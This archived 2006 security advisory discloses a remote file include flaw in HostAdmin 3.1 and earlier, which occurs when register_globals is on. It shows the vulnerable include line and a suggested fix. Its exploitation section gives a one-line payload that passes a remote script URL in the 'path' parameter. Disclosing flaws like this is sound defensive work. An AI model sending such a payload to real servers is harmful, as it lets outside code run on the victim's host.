AOH :: HP Unsorted H :: B06-2731.HTM

Hostadmin <= 3.1 - remote file include vulnerability



HostAdmin <= 3.1 - Remote File Include Vulnerability
HostAdmin <= 3.1 - Remote File Include Vulnerability



[MajorSecurity #9]HostAdmin <= 3.1 - Remote File Include Vulnerability
-------------------------------------------------------------------------

Software: HostAdmin

Version: <=3.1

Type: Remote File Include Vulnerability

Date: June, 3rd 2006

Vendor: dreamcost

Page: http://dreamcost.com

Risc: High

Credits:
----------------------------

Discovered by: David 'Aesthetico' Vieira-Kurz
http://www.majorsecurity.de

Original Advisory:
----------------------------
http://www.majorsecurity.de/advisory/major_rls9.txt

Affected Products:
----------------------------

HostAdmin 3.1 and prior

Description:
----------------------------

HostAdmin is designed to automate your entire account and order management, recurring billing,
domain registration, server provisioning, and reporting needs. From creating the member account,
logging the member in, displaying available hosting and domain registration options,
providing a shopping cart and ordering mechanism for the available products, and creating the order record,
HostAdmin will handle your requirements with speed and ease.

Requirements:
----------------------------

register_globals = On

Vulnerability:
----------------------------

Input passed to the "path" parameter in "index.php", "functions.php" and "members.php" is not
properly verified, before it is used to include files.
This can be exploited to execute arbitrary code by including files from external resources.

Solution:
----------------------------

I think you can fix this bug by replacing the following vulnerable code in the
this 3 php-files with my one. It should fix the vulnerabilty and solve this
problem.

Vulnerable one:   "include($path . "member_template.html");"
MajorSecurity fix: "include("member_template.html");"

Set "register_globals" to "Off".

Exploitation:
----------------------------

Post data:

path=http://www.yourspace.com/yourscript.php? 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.